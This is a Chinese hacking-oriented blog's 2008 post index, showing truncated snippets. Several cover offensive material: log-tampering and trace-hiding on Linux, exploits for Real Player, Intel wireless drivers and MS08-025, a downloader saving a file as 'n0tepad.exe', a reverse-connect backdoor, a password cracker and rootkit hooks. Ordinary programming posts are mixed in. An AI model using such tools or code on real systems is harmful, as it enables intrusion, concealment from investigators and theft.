- 博客(235)
- 资源 (6)
- 收藏
- 关注
原创 输入小助手.vbs
有时,渗透时,溢出得个SHELL,或只有一个CMDSHELL,想下载些东西,或上传东西,时真是不方便啊 特别是当目标不能上网,或限制比较严格时… ECHO东西,手工输入,那个累啊….还是弄个脚本方便些… //把要ECHO的脚本,拖到此脚本上...根据提示操作即可 On Error Resume NextSet Arg=Wscript.argumentsIf Arg.count=0
2008-04-30 17:32:00 1127
原创 logtamper-v1.0 修改linux 日志的工具
还是放出来好了,免得老找我要这东西。功能应该比网上的日志清除工具都要好。它是修改,而不是纯粹的删除和清空基于wtmpclean改的,所以我名字都没换上几张图好了:修改wtmp与utmp 与username和hostname相符的条目,同时保留timestamp 修改lastlog,在下次同一帐号登录显示同一IP和时间。 所有文件都保留了timestamp 功能应该凑合够用了,主要是w
2008-04-30 17:31:00 2468
原创 跨站脚本-攻击和防御指向
摘要:1>什么是XSS?2>XSS脚本攻击3>制造一个cookie攻击4>保护XSS5>笨方法6>过滤绕过7>Flash攻击8>XSS 上传9>XSS 钓鱼____ ____/ / / /______/ /_____________________________________/ /______| / / / / || / /.:Chapter 1 - 什么是XSS? :./ / ||___/
2008-04-30 17:29:00 1286
原创 通用Inline Hook代码
#include "inlinehook.h"typedef struct _INLINE_HOOK_ITEM{ PBYTE HookAddress; //inlinehook 的位置 DWORD OrgBytesSize; // //PBYTE OrgBytes; //原始函数字节 PBYTE Ho
2008-04-30 17:10:00 1802
原创 远程无线攻克你的系统--Intel无线网卡的漏洞
Intel - PRO/Wireless 2200BG Network Connection,估计很多机器都是这个型号的无线网卡,赶紧升级吧..http://www.milw0rm.com/exploits/5461### This file is part of the Metasploit Framework and may be subject to# redistribution an
2008-04-30 17:08:00 1288
原创 警惕:多款杀毒软件存在严重漏洞
新闻来源:CoreLabs Advisory(AYANAMI REI的翻译)对多款杀毒软件和防火墙的SSDT Hook函数的参数验证不严。通过对多款杀毒软件和防火墙的(BitDefender Antivirus [1], Comodo Firewall [2], Sophos Antivirus [3]和瑞星杀毒软件[4])的SSDT hook 函数的粗略检查发现可以导致拒绝服务(DOS),并可能
2008-04-30 17:06:00 1162
原创 linux入侵踪迹隐藏攻略
前言:被警察叔叔请去喝茶时间很痛苦的事情,各位道长如果功力不够又喜欢出风头的想必都有过这样的“待遇”。如何使自己在系统中隐藏的更深,是我们必须掌握的基本功。当然,如果管理员真的想搞你而他的功力又足够足的话,相信没什么人能够真正的“踏雪无痕”。Forensic 与Anti-Forensic,说到底只是你和管理员之间的技术间较量而已。貌似很少有专门说这个的文章,大部分就是下载个日志擦除的软件,然后运行
2008-04-30 17:05:00 1090
原创 远程包含和本地包含漏洞的原理
首先,我们来讨论包含文件漏洞,首先要问的是,什么才是"远程文件包含漏洞"?回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶的目的。几乎所有的 cgi程序都有这样的 bug,只是具体的表现方式不一样
2008-04-30 17:04:00 7420
原创 Real Player rmoc3260.dll Exp
milw0rm上的,生成器lcx给的,稍微改了改代码,据说好用未测试,最近忙到自杀的时间都没有唉,可惜有马时候没洞,有洞时候没马,要不就找个站挂上了。http://www.blogjava.net/Files/baicker/Real_Player_rmoc3260_exp.rar一下来源:lcx以下代码保存成vbs,双击即可On Error Resume NextExeurl = Inpu
2008-04-30 17:01:00 1159
原创 使用Visual Studio 2005编写纯C程序
步入.net时代后,VS马上就换了个脸,对那些平时用VC做作业的人来说,立马就受到了个下马威——直接新建源代码不能编译了!看到菜单栏上一堆一堆的选项,仿佛VS2005已经不能作为纯C的IDE使用了。然而VS的功能太强大,到底能否使用VS2005/2003编写纯C程序呢?当然可以!只是步骤会麻烦一些。首先,新建一个项目/工程: 选择“Win32控制台应用程序”。有些老师建议选择空项目,但是试过之后
2008-04-30 17:00:00 1801
原创 利用GetPrivateProfileString读取配置文件(.ini)
配置文件中经常用到ini文件,在VC中其函数分别为:写入.ini文件:bool WritePrivateProfileString(LPCTSTR lpAppName,LPCTSTR lpKeyName,LPCTSTR lpString,LPCTSTR lpFileName);读取.ini文件:DWORD GetPrivateProfileString(LPCTSTR lpAppName, LPC
2008-04-30 16:59:00 1465
原创 IPC空连接测试代码
//****************************************************//****** 网蝉工具--135弱口令猜解器 ******//ip.txt纪录要猜测的IP地址。//user.txt纪录要猜测的用户名。//password.txt纪录要猜测的密码。//3个文件格式为标准的字典文件, 方便与修改和承接其他扫描器扫出的结果。//**************
2008-04-30 16:43:00 1274
原创 判断Windows系统补丁
来自微软脚本专家:Set objSession = CreateObject("Microsoft.Update.Session")Set objSearcher = objSession.CreateUpdateSearcherSet objResults = objSearcher.Search("Type=Software")Set colUpdates = objResults.U
2008-04-30 16:42:00 1317
原创 使用perl通过adsi接口导出AD帐户列
开始是luoluo做的一个vbs脚本,实现从AD导出用户名的功能。脚本方面我偏爱perl,因此用perl重做了一个,顺便修复了luoluo脚本中的一个小bug,加了一行使脚本能够导出1000个以上的账号。perl脚本很简单,主要注意几点,首先是adsi的属性使用hash表的方式来设置或者获取;另外一个是注意有的属性有点不一样,需要设置hash的hash,例如$objCommand -> Prope
2008-04-30 16:41:00 1095
原创 攻击木马--远程控制软件自身的漏洞
前两天的RSA conference上,有个叫Joel Eriksson的研究人员展示如何通过攻击木马(尤其是木马的控制端)来控制“黑客”。blog.wired.com/27bstroke6/2008/04/researcher-demo.htmlEriksson找到了一个在天朝比较流行的PCshare的漏洞,可以上传文件到控制端的自启动目录。:)这是他展示的Pcshare的图片,这张貌似和他说的
2008-04-30 16:40:00 1240
原创 ATAPI(磁盘端口驱动)级文件保护简单实现
define IoGetIrpStackLocation( Irp , Level) (/ (Irp)->Tail.Overlay.CurrentStackLocation + Level )BOOL IfIrpHasFobj(PIRP pIrp , LPCWSTR FileName){ULONG i , j ;PIO_STACK_LOCATION irpStack ;PVOID NamePool
2008-04-30 16:40:00 1237
原创 Windows组件0Day漏洞 通杀IE6与IE7浏览器
[0day]Microsoft Works 7 WkImgSrv.dll crash POC,dll版本7.03.0616.0,IE7+Windows XP SP2 测试通过。[html][head][title]Microsoft Works 7 WkImgSrv.dll crash POC[/title][script language="JavaScript"] function pay
2008-04-30 16:38:00 752
原创 比较流行的数据库挂马
google_ad_client="pub-6065469188450680";google_ad_width=728;google_ad_height=90;google_ad_format="728x90_as";google_ad_type="text_image";google_ad_channel="6872543818";2007-01-10 15:00
2008-04-30 16:37:00 929
原创 逆向一个直接IO硬盘的驱动
【文章标题】: 逆向一个直接IO硬盘的驱动【文章作者】: prince【作者邮箱】: cracker_prince@163.com【作者QQ号】: 812937【软件名称】: SectorOperator.sys【下载地址】: http://bbs.pediy.com/showthread.php?s=&threadid=30708【加壳方式】: 无【编写语言】: ---【使用工具】: IDA 5
2008-04-30 16:32:00 1712
原创 一份非常棒的inline hook 代码
废话不多说,代码如下:#include #include #include ULONG g_KiInsertQueueApc;ULONG g_uCr0;BYTE g_HookCode[5] = { 0xe9, 0, 0, 0, 0 };BYTE g_OrigCode[5] = { 0 }; // Ôº¯Êý
2008-04-29 10:36:00 1323
原创 NT内核下的inline hook
inline hook原理大概如下: 修改被HOOK函数A的头5个字节,使其跳转到我们自定义的函数B,函数B的类型与函数A要相同。因为我们是使用JMP直接跳转到函数B, 而不是使用正常的CALL指令。在函数B内,我们可以检查函数参数,然后可以直接返回。也可以再调用函数A的一个副本。这个副本在HOOK动作发生的同时,就保存下来了。 代码非常简单,工程打包供大家学习。高手飘过/* *
2008-04-29 10:12:00 1160
原创 一种注入进程,获得完全操控的方法之二
看到了我的之一,我想大家会很清楚,因为这个方法的最大的BUG就是在回调函数之后来处理,如果前面已经处理了,那么我们就无法处理了。而且又要修改系统DLL,比较不完美。我最近又发现了两种方法: 一、修改RegisterClassA: 相对前面的方法来说,这个方法很好用,因为,我们可以很容易把回掉函数改掉。类似如下代码://--------------------------------------
2008-04-29 10:10:00 785
原创 inline hook和IDT hook结合
inline hook就是修改一个函数里面的几个字节为一条跳转指令,jmp到自己的函数中执行...... IDT HOOK就是修改IDT表中正常的异常处理例程的入口函数,为自己的函数地址 把这俩种思想结合起来就是""""一个字节钩子"""" 请看 nt!NtOpenFile: 80579
2008-04-29 10:08:00 858
原创 rootkit 直接访问硬件之[一]
作 者: combojiang时 间: 2008-03-27,15:14链 接: http://bbs.pediy.com/showthread.php?t=62020今天我们一起来学习下如何实现ring3程序直接访问硬件。这部分内容跟windows保护模式中的I/O保护部分有直接的关系。rootkit直接访问硬件准备写三篇,今天是开篇。后续请大家继续跟贴。高手飘过,呵呵。我们来看看Windows
2008-04-29 10:07:00 1001
原创 发一个下载者代码
void download(){DWORD dwStatusCode; char dwStatusCode1[32]; DWORD dwSize1 = sizeof(dwStatusCode1); DWORD dwSize = sizeof(DWORD); int filesize; LPCSTR localPatch="c://windows//n0tepad.exe"; HINTERNET h
2008-04-24 16:28:00 1407 1
原创 共享杀线程的代码
/* TerminateThread.c */ #include "ntddk.h" #include "LDasm.h" //网上很多的,自己找一个好了。 typedef enum _KAPC_ENVIRONMENT { originalApcEnvironment, AttachedApcEnvironment, Curren
2008-04-24 16:26:00 955
原创 Sql注入SA权限CMD终结者C源码
Poered By CoolDiyer //由于时间问题,没加注释学过C的应该都能看懂 ////////////////////////////////////////////////////////////////////////////////////////////////////// #include #include #include #include #pragma comment
2008-04-24 16:24:00 1742 1
原创 MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit
MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit另一种利用方式,通过覆盖SSDT表NtVdmControl的地址进行shellcode的执行#include #include typedef LONG NTSTATUS; typedef NTSTATUS (NTAPI *PNTALLOCATE)(HANDLE
2008-04-22 16:27:00 1710 1
原创 最通用的自删除代码
过win 98/2000/xp/2003 (Vista没有测试 因为我没有Vista)#include #pragma oncevoid SelfDel(){ int i; HANDLE hFile; DWORD dwWritten; char selfpathaaa[MAX_PATH]={0}; char command[2048]={0}; char name[]="a
2008-04-21 10:36:00 1483 1
原创 sdcs V2.3 exe/dll 正+反弹后门
// SmartDoor.cpp : 定义 DLL 应用程序的入口点。//http://www.dream2fly.net///源码公布说明:从网络中来到网络中去,QQ:78623269定制^_^#include "stdafx.h"#include "SDdllw.h"#include #include #include #include using namespace::std;#includ
2008-04-21 10:35:00 1278
原创 Dll 文件脱壳
在分析样本时偶尔会遇到加保护壳的 Dll 文件,脱起来比较麻烦。由于加壳 Dll 文件的壳代码都是在 DllMain() 函数中,在调用 LoadLibrary() 加载 Dll 文件时,主函数就会执行。因此可以写个程序加载 Dll 文件,然后 Dump 出来,即可完成脱壳。虽然不能确定入口点和修复导入表,但代码部分应该都是正常的。具体代码如下:#include #include #include
2008-04-21 10:33:00 4278 2
原创 应用层下拷贝以独占方式打开的文件
在调用 CreateFile 这个 API 时,若 dwShareMode 这个参数赋为 0;则在此文件句柄被关闭之前,这个文件是无法被其它进程直接读取和拷贝的。比如文件 %SYSTEM%/config/SAM 就是被 system 进程以独占方式打开的。在应用层下,通过读簇的方式,能够实现对这种文件的拷贝。大概流程为:以FILE_READ_ATTRIBUTES 访问模式调用 CreateFil
2008-04-21 10:32:00 2078
原创 GetACP 使用
今天分析一个加了变形壳的样本,感觉不像有什么保护,可是一运行就退出了。仔细调试了一下,发现是壳中这段代码导致的退出:call dword ptr ds:[edi-10] ;GetACPcmp eax,3A8 jnz short nextpush 0call dword ptr ds:[edi-14] ;ExitProcess上网查了一下,GetACP
2008-04-21 10:31:00 3480
原创 深入理解C语言指针的奥秘
指针是一个特殊的变量,它里面存储的数值被解释成为内存里的一个地址。 要搞清一个指针需要搞清指针的四方面的内容:指针的类型,指针所指向的 类型,指针的值或者叫指针所指向的内存区,还有指针本身所占据的内存区。让我们分别说明。 先声明几个指针放着做例子: 例一: (1)int*ptr; (2)char*ptr; (3)int**ptr; (4)int(*ptr)[3]; (5
2008-04-18 17:33:00 923
原创 交叉编译Linux内核(2.6.22.6)
动手编译内核之前,至少应该看看源码根目录下的README文件,并参考一些其他的资料,了解编译一个内核所需要的基本条件和环境,以及基本的步骤。 我使用的交叉编译器是arm-iwmmxt-linux-gnueabi-gcc(4.2.1),选用的内核版本是Linux-2.6.22.6。以下操作均以普通用户身份进行: (1)make mrproper 编译之前检查内核源码树是否“
2008-04-18 17:32:00 1158
原创 Linux内核代码风格
Documentation/zh_CN/CodingStyle | 676 +++++++++++++++++++++++++++++++++++++++1 files changed, 676 insertions(+), 0 deletions(-)create mode 100644 Documentation/zh_CN/CodingStylediff --git a/Document
2008-04-18 17:31:00 1639
原创 Linux内核代码架构图
类别:Linux Kernel | 添加到搜藏 | 浏览(52) | 评论 (3) /*<![CDATA[*/var pre = [true,linux裁减, linux裁减,/zkh
2008-04-18 17:30:00 3664 1
原创 Linux 系统裁减指南(LiPS)(第三部分)
6 引导6.1 引导过程概述6.2 几种引导方式 几种引导方式的粗略比较如下表所示。优点缺点DOCDOMFLOPPYHARDDISKNETWORKUSB-HDD容量大,读写可靠 6.3 grub引导器 有了前面生成的Linux内核和根文件系统映像文件后,制作引导盘非常简单。在动手制作引导盘之前,最好先了解一下grub引导器。 Grub是一个通用的多引导加载软件,与较早期多数Linux发行版
2008-04-18 17:29:00 1475
原创 Linux 系统裁减指南 (LiPS)》
LiPS 详细设计说明书————————————(Linux 系统裁减指南)一种创建小型化Linux系统的方法目 录1 引言 61.1 编写目的 61.2 背景 61.3 定义 61.4 参考资料 62 总体描述 82.1 硬件环境 82.2 软件环境 82.3 需求规定和约束 83 总体设计 93.1 基本设计概念 93.2 软件结构 94 内核 104.1 创建内核的方法 104.2 内核
2008-04-18 17:28:00 2443
原创 Linux 系统裁减指南3
5.6 再论initrd在前面的5.3节中,对initrd机制已经有了比较详细的讨论。准确的说,该部分内容来自linux-2.4/Documentation/initrd.txt 文件。但是在实践中,我们发现其中描述的有些方法并不适用。是新版本内核的变化造成的(内核实现与文档不同步),还是2.4版内核的bug,不得而知。在我查证的过程中,看到网上有不少相关的问题和讨论。遗憾的是至今我还不能确认到底
2008-04-18 17:27:00 1804
UDP协议可靠传输文件
2011-09-14
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人